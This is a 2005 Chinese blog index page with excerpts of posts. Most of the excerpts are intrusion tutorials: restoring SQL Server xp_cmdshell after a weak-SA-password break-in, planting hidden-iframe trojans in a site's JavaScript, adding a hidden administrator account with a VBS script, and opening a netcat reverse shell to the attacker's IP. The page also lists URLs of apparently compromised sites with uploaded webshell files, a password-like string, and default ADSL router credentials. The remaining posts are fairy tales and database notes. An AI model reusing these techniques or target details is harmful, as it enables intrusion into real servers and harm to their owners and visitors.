- 博客(17)
- 资源 (13)
- 收藏
- 关注
RSS订阅原创 对1433端口SA权限的再突破- -
对1433端口SA权限的再突破作者:net 文章来源:net org黑客X档案青野志狼有一篇文章>。文章写到了在知道sql服务器的SA用户名弱密码后,而服务器去掉了SA的xp_cmdshell权限的情况下,如何通过SQL命令恢复SA的xp_cmdshell权限来进行入侵。这样入侵(详细请看原文)的前提是服务器的xplog70.dll没有被删除或改名,这一点青野志狼也谈到了,但是他没有写在
2005-08-05 10:25:00
1331
原创 SQL恢复XP_CMDSHLL,以及XPLOG70.DLL被删,直接用SQL连接器开启3389
content>用SQL连接器恢复XP_CMDSHLLE的命令(1)SQL Query Analyzersp_addextendedproc xp_cmdshell,@dllname=xplog70.dll(2)首先在SqlExec Sunx Version的Format选项里填上%s,在CMD选项里输入sp_addextendedproc xp_cmdshell,xpsql70.dll
2005-08-05 10:24:00
1761
转载 http://www.iam-flying.com/admin/ewebeditor/UploadFile/200571017610619.asa
http://www.iam-flying.com/admin/ewebeditor/UploadFile/200571017610619.asa
2005-07-10 17:15:00
1408
转载 http://www.yqrk.cn/my2006.asp
http://www.yqrk.cn/my2006.asphttp://www.yqrk.cn/tow5.asphttp://www.yqrk.cn/cctv/ewebeditor/UploadFile/2005710162725493.asahttp://www.yqrk.cn/cctv/ewebeditor/admin_style.aspwhjtobyfuckyou
2005-07-10 16:50:00
1031
转载 http://www.mycconline.com
http://www.mycconline.com/eWebEditor_v280_Free/eWebEditor_v280_Free/UploadFile/200571015580950.asahttp://www.mycconline.com/eWebEditor_v280_Free/eWebEditor_v280_Free/admin_style.aspwhjtobyfuckyou
2005-07-10 16:15:00
1743
转载 WEBSHELL 提权思路
哈!发现DVBBS7.1 论坛前几天有朋友告诉我件事情,说有许多白痴管理员用备分的日期做备分数据库的名字哦!试试看!dvbbs7.1 是4月6日更新的,他用该用200504**.mdb做名字来命名以前的旧数据库!没办法,试试!http://www.xxxx.com/bbs/databackup/20050406.mdbhttp://www.xxxx.com/bbs/databackup/20050
2005-06-18 20:58:00
1087
转载 小红帽
从前有个可爱的小姑娘,谁见了都喜欢,但最喜欢她的是她的奶奶,简直是她要什么就给她什么。一次,奶奶送给小姑娘一顶用丝绒做的小红帽,戴在她的头上正好合适。从此,姑娘再也不愿意戴任何别的帽子,于是大家便叫她“小红帽”。 一天,妈妈对小红帽说:“来,小红帽,这里有一块蛋糕和一瓶葡萄酒,快给奶奶送去,奶奶生病了,身子很虚弱,吃了这些就会好一些的。趁着现在天还没有热,赶紧动身吧。在路上要好好走,不要跑,
2005-06-17 06:53:00
1138
转载 青蛙王子
在遥远的古代,人们心中的美好愿望往往能够变成现实。就在那个令人神往的时代,曾经有过一位国王。国王有好几个女儿,个个都长得非常美丽;尤其是他的小女儿,更是美如天仙,就连见多识广的太阳,每次照在她脸上时,都对她的美丽感到惊诧不已。 国王的宫殿附近,有一片幽暗的大森林。在这片森林中的一棵老椴树下,有一个水潭,水潭很深。在天热的时候,小公主常常来到这片森林,坐在清凉的水潭边上。她坐在那里感到无聊的时
2005-06-17 06:40:00
1028
转载 玫瑰公主
以前,有个国王和王后一直没有孩子,他们为此非常伤心苦恼。有一天,王后正在河边散步,一条小鱼把头浮出水面对她说:“你的愿望就会实现了,不久你就会生下一个女儿的。”过了一段时间,那条小鱼所预言的情况真的实现了,王后真的生下了一个非常漂亮的女儿。国王高兴得时时刻刻爱不释手,决定举行一个大型宴会。他不仅邀请了他的亲戚、朋友和外宾,而且邀来了几乎所有的女巫师,让她们为他的女儿送来善良美好的祝愿。他的王国里一
2005-06-17 06:39:00
989
转载 白雪公主
严冬时节,鹅毛一样的大雪片在天空中到处飞舞着,有一个王后坐在王宫里的一扇窗子边,正在为她的女儿做针线活儿,寒风卷着雪片飘进了窗子,乌木窗台上飘落了不少雪花。她抬头向窗外望去,一不留神,针刺进了她的手指,红红的鲜血从针口流了出来,有三点血滴落在飘进窗子的雪花上。她若有所思地凝视着点缀在白雪上的鲜红血滴,又看了看乌木窗台,说道:“但愿我小女儿的皮肤长得白里透红,看起来就像这洁白的雪和鲜红的血一样,那么
2005-06-17 06:39:00
939
转载 网页木马收肉鸡隐藏一个框架网页
有了WEBSHELL拉,可以修改主页了,想在上面挂个网页木马收肉鸡,我这里有个很巧妙的方法,大家说的挂马也就是在页面上隐藏一个框架网页..... 先找找主页里面是否有JS的脚本,找到script language="javascript" src="xxxx.js"之类就成功了,接下来把这个JS下载下来,往里面加以下代码(最好在原来的代码上,回车一行加上代码)document.write(h
2005-06-16 12:22:00
1413
转载 vbs脚本加启动项提升webshell的管理权限
1.先用TXT文件写个shell.vbs,添加一个管理员,代码如下:on error resume nextset shell=createobject("wscript.shell")shell.run"cmd.exe /c net user ray$ /del",false,falseshell.run"cmd.exe /c net user ray$ 1984 /add",false,fal
2005-06-16 12:09:00
1643
转载 webshell里nc反向连接获得cmd shell的方法
在webshell里操作CMD很不爽,直接上传一个nc,打入以下命令:nc -vv 你的IP地址 8000 -e cmd.exe然后在本机用nc监听一个端口,命令如下:nc -vv -l -p 8000稍微等下,就会连接一个shell了.补充:以上只是示范命令,实际操作如在海洋2006里的WScript.Shell程序运行器中,一定要输入nc的绝对路径!例子:路径:E:/wwwroot/www/c
2005-06-16 12:07:00
2865
转载 通杀网页源代码加密
在地址栏或按Ctrl+O,输入:javascript:s=document.documentElement.outerHTML;document.write();document.body.innerText=s;源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果.
2005-06-01 12:55:00
1549
原创 SQL查询语句基础
SQL查询语句基础DataTrans-1500服务器是用SQL Server服务器作数据的底层管理,当用户对DataTrans-1500服务器进行查询时,服务器通过search.command命令文件以及.from检索途径对象来构造SQL查询语句,通过此SQL 查询语句来对SQL Server服务器发起检索。DataTrans-1500服务器的系统管理员,了解、掌握SQL查询语句的语法,能更好的作
2005-05-30 11:53:00
2093
转载 adsl 路由器默认密码
adsl 路由器默认密码 艾玛 701g 192.168.101.1 192.168.0.1 用户名:admin 密码:admin 用户名:SZIM 密码:SZIM 艾玛701H 192.168.1.1 10.0.0.2 用户名:admin 密码:epicrouter 实达2110EH ROUTER 192.168.10.1 用户名:user 密码:password 用户名
2005-05-22 15:58:00
1435
转载 数据库连接大全(摘自: http://www.connectionstrings.com/)
SQL Server ODBC Standard Security:"Driver={SQL Server};Server=Aron1;Database=pubs;Uid=sa;Pwd=asdasd;" Trusted connection:"Driver={SQL Server};Server=Aron1;Database=pubs;Trusted_Connection=yes;" P
2005-04-29 09:19:00
1508
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人